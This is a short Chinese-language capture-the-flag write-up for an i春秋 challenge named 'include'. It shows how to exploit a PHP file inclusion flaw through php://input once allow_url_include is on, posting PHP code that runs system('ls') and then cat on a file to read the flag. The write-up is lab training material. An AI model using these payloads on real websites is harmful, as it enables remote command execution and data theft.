i春秋include
打开题目,发现它提示我们有个phpinfo.php,所以我们直接访问,没有什么特殊的发现,根据题目提示include,找到allow_url_include的信息
(ctrl+f直接进入网页搜索)
发现是打开的。即允许php://input的形式,所以这里使用post传输数据
构造url:
http://169c1b893df145ceab40a9f940fab6573f46d3b3eb8d426a.changame.ichunqiu.com/?path=php://input
使用post传入一句话木马:<?php echo system('ls');?>
Run一下爆出许多文件
再使用bp抓包,修改下面的一句话木马中的值为<?php system("cat dle345aae.php");?>再传入repeater中Go一次得到flag